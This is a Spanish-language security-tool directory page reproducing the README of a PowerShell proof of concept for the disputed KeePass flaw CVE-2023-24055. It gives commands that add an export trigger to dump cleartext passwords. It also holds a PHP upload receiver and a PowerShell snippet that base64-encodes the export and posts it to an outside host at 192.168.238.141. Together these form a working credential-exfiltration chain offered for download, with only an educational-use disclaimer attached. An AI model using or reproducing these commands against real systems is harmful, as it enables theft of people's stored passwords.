Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-24055 — POC de CVE-2023-24055 escrito en PowerShell. | Kitploit
Herramientas/GitHubGitHub/yosef0x01/cve-2023-24055
Ataques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExfiltración de DatosAprendizaje y Educación
GitHubyosef0x01/cve-2023-24055

CVE-2023-24055

POC de CVE-2023-24055 escrito en PowerShell.

Ver Repositorio
14hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

alt text

Descargo de responsabilidad

Este script es únicamente para fines educativos y de demostración. El autor no respalda ni aprueba el uso de este script para actividades criminales o maliciosas, y solo debe usarse donde se permita explícitamente con el permiso adecuado.

Este script debe usarse con precaución, ya que modificará el archivo de configuración de KeePass y eliminará cualquier disparador configurado previamente. El uso de este script puede provocar un comportamiento inesperado y potencialmente romper la aplicación KeePass. Úselo bajo su propio riesgo.

Introducción

Este script demuestra la vulnerabilidad ** EN DISPUTA ** (CVE-2023-24055) de KeePass hasta la versión 2.53 (en una instalación predeterminada), ya que permite que un atacante con acceso de escritura al archivo de configuración XML obtenga las contraseñas en texto claro añadiendo un disparador de exportación. Tenga en cuenta que la postura del proveedor es que la base de datos de contraseñas no está diseñada para ser segura contra un atacante que tenga ese nivel de acceso al PC local.

Referencias:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24055
  • https://www.bleepingcomputer.com/news/security/keepass-disputes-vulnerability-allowing-stealthy-password-theft/
  • https://keepass.info/

Instrucciones

Para usar este script, ejecútelo en PowerShell y proporcione los parámetros necesarios. Los parámetros obligatorios son:

  • -filename: La ruta completa y el nombre del archivo al que se exportarán las contraseñas.

Los parámetros opcionales son:

  • -uploadURL: Este conmutador se utiliza para especificar que los datos deben subirse a la URL indicada.
  • -url: La URL a la que se deben subir los datos.

Ejemplo de uso

Exportar contraseñas en texto claro:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt

Exportar contraseñas en texto claro y subir la exportación al servidor web:

root@kitploit:~
.\KlearPass.ps1 -filename c:\windows\tasks\export.txt -uploadURL http://192.168.238.141/KeePass/upload.php

Ayuda detallada:

root@kitploit:~
get-help .\KlearPass.ps1 -Detailed

Ejemplo de script PHP para subir un archivo al servidor web

root@kitploit:~
<?php
if (!empty($_POST['filename']) && !empty($_POST['data'])) {
    $target_directory = '/var/www/html/KeePass/uploads/';
    $filename = $target_directory . $_POST['filename'];
    $data = base64_decode($_POST['data']);
    file_put_contents($filename, $data);
}
?>

Ejemplo de script PowerShell para probar la subida PHP

root@kitploit:~
$filename = "c:\windows\tasks\export.txt";
$file = [System.IO.Path]::GetFileName($filename);
$encodedFile = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes([System.IO.File]::ReadAllText($filename)));
$http = New-Object System.Net.WebClient;
$http.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
$http.UploadString("http://192.168.238.141/KeePass/upload.php", "filename=$file&data=$encodedFile");

Créditos

  • Script inicialmente basado en el código encontrado en https://github.com/GhostPack/KeeThief/blob/master/PowerShell/KeePassConfig.ps1
  • La idea de exfiltrar la exportación se atribuye a https://github.com/alt3kx/CVE-2023-24055_PoC.
Descargar herramienta